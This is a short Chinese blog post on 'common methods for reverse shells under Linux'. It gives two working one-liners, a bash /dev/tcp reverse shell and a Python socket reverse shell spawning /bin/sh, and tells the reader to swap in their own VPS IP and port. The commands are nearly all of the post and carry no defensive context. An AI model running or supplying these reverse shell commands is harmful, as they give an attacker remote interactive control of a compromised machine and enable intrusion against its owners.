标签 linux 下的文章

Linux下反弹Shell的常用方法


额,我个人目前只有两种方式反弹shell,暂时没有碰到过奇葩的linux,所以目前只用过两种。

bash弹shell
xx.xx.xx.xx换成你的vps ip,82换成你vps监听的端口

bash -i >& /dev/tcp/xx.xx.xx.xx/82 0>&1       

Python反弹shell
xx.xx.xx.xx换成你的vps ip,82换成你vps监听的端口

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",82));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'